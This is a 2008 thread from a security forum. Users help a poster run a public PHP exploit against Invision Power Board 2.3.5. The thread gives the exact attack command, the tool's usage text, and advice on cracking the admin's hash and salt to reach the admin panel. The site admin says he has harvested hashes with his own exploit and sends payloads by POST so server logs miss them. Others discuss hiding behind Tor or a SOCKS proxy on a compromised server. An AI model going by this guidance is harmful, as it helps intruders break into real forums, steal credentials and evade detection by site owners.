Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 798
Members: 0
Total: 798
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> Cant figure out Darkfig's Exploit.. Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Cant figure out Darkfig's Exploit..
PostPosted: Wed Sep 17, 2008 7:50 pm Reply with quote
Cablekid
Advanced user
Advanced user
 
Joined: Jul 14, 2007
Posts: 85




Hey i cant figure out the command?

How do i do it..

i can run it, but i cant figure out how to put the arguments in.
any examples?

such as http://google.com attack 1 2
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 2:40 am Reply with quote
Cablekid
Advanced user
Advanced user
 
Joined: Jul 14, 2007
Posts: 85




Anyone?
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 5:04 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




php.exe ipb235-multi.php -attack 3 -url http://www.ipb-235.com/forum/ -uid 1
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 5:17 pm Reply with quote
Cablekid
Advanced user
Advanced user
 
Joined: Jul 14, 2007
Posts: 85




Thanks That worked!

But it gives me the Sid. but i try changeing it in the cookies and then live http headers. but it dosent do anything?

Am i doing something wrong?
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 5:33 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Cablekid wrote:
Thanks That worked!

But it gives me the Sid. but i try changeing it in the cookies and then live http headers. but it dosent do anything?

Am i doing something wrong?


Attack 3 give's you hash and salt of user with id=1(root admin by default).Decrypt this hash:salt with passwordspro and if you have luck you mai enter in admincp.After that.Well.Use your imagination.Smile
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 6:22 pm Reply with quote
Cablekid
Advanced user
Advanced user
 
Joined: Jul 14, 2007
Posts: 85




You sure? attack 3 gives you that?

Code:
  1 - PHP code execution

    -url        IPB url with ending slash

    -uname      targeted username
    -uid        OR the targeted user id (def: 1)

    -prefix     sql table prefix (def: ibf_)
    -acp        admin control panel path (def: admin


  2 - Insecure SQL password usage

    -ip         your current IP
    -dict       a wordlist file

    -url        IPB url with ending slash
    -uname      a valid member username
    -pwd        the associated password

    -uid        OR  the targeted member id
    -passhash   the passhash cookie value
    -stronghold the stronghold cookie value

    -sqlusr     you can precise the sql user
    -prefix     sql table prefix (def: ibf_)


  3 - Password bruteforcer

    -dict       a wordlist file

    -url        IPB url with ending slash
    -uname      targeted username
    -uid        OR  the targeted user id (def: 1)
    -prefix     sql table prefix (def: ibf_)

    -passhash   OR the passhash value
    -salt       the salt value


  Optional:

    -proxhost <ip>       if you wanna use a proxy
    -proxauth <usr:pwd>  proxy with authentication


php.exe file.php -attack 3 -url http://community.com/ -uid 1

Thats what i ran but it just echo the attacks again.
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 6:58 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Well my engl is not so good but i can read.Smile

3 - Password bruteforcer

-url IPB url with ending slash
-uid OR the targeted user id (def: 1)
-passhash OR the passhash value
-salt the salt value
View user's profile Send private message
PostPosted: Thu Sep 18, 2008 8:28 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I'm writing my own exploit right now, based on same darkfig's advisory. Basically it's allready working sploit and i've harvested some hashes. Still, some testing and improvement is needed and within next 1...2 days public exploit will be available. Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 19, 2008 5:19 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




waraxe wrote:
I'm writing my own exploit right now, based on same darkfig's advisory. Basically it's allready working sploit and i've harvested some hashes. Still, some testing and improvement is needed and within next 1...2 days public exploit will be available. Smile


waraxe незабъвай

Optional:

-proxhost <ip> if you wanna use a proxy
-proxauth <usr:pwd> proxy with authentication

очень важная опция.
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 8:43 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




koko wrote:
waraxe wrote:
I'm writing my own exploit right now, based on same darkfig's advisory. Basically it's allready working sploit and i've harvested some hashes. Still, some testing and improvement is needed and within next 1...2 days public exploit will be available. Smile


waraxe незабъвай

Optional:

-proxhost <ip> if you wanna use a proxy
-proxauth <usr:pwd> proxy with authentication

очень важная опция.


I'm using tor via curl/proxy interface. And by the way, my exploit is using POST requests, so that Apache logs will show "index.php" as request. All the bad stuff is located in POST fields and usually is not logged at all Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 19, 2008 9:21 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




tor sucksss
сокс которъй тъй запустил на левом серваке без логов вот ето уже дело.И конечно сокс стоит зад basic auth.POST запросъй довнъм довно логируются на сериознъх серваках.Smile
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 9:32 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, some servers are logging POST fields, but only some ...
About tor - is there any stories about successful backtrace? I mean, tor is not private - final node will see plaintext traffic. But tor is anonymous and very hard to backtrace. Of course, private socks daemon on pwned server is better, i'm agree, but tor is easy to use - just 1 minute to download and install and you are almost safe Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 19, 2008 9:36 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Тор бъл написан по заказу Министерство оборонъй США.Сори но такой анонимности мне не подходит.SmileДа его легко изпользовать.У тебя хоть есть возможности можеш найти себе кучу левъх серваков.Запусти себе сокс и радуйся жизни.Smile

насчот бактрейса тора.Да есть знакомъе которъе отлавливали трафик других ползвателей при помощи снифероф.
View user's profile Send private message
PostPosted: Fri Sep 19, 2008 10:16 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, sniffing is possible, but i have not heard any case of backtrace. I know, that tor was developed with US DoD funding Smile ... but unless your are trying to sell plutonium or something like that, it's backtrace-proof.
Besides, tor can be used with other methods, like private socks server. And of course SSL/SSH/VPN and other crypto layers can make sniffing at final node useless Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Oct 04, 2008 8:47 am Reply with quote
Jolk
Beginner
Beginner
 
Joined: Oct 04, 2008
Posts: 1






then what can i do ??

bad english sorry.
View user's profile Send private message Send e-mail
Cant figure out Darkfig's Exploit..
  www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.154 Seconds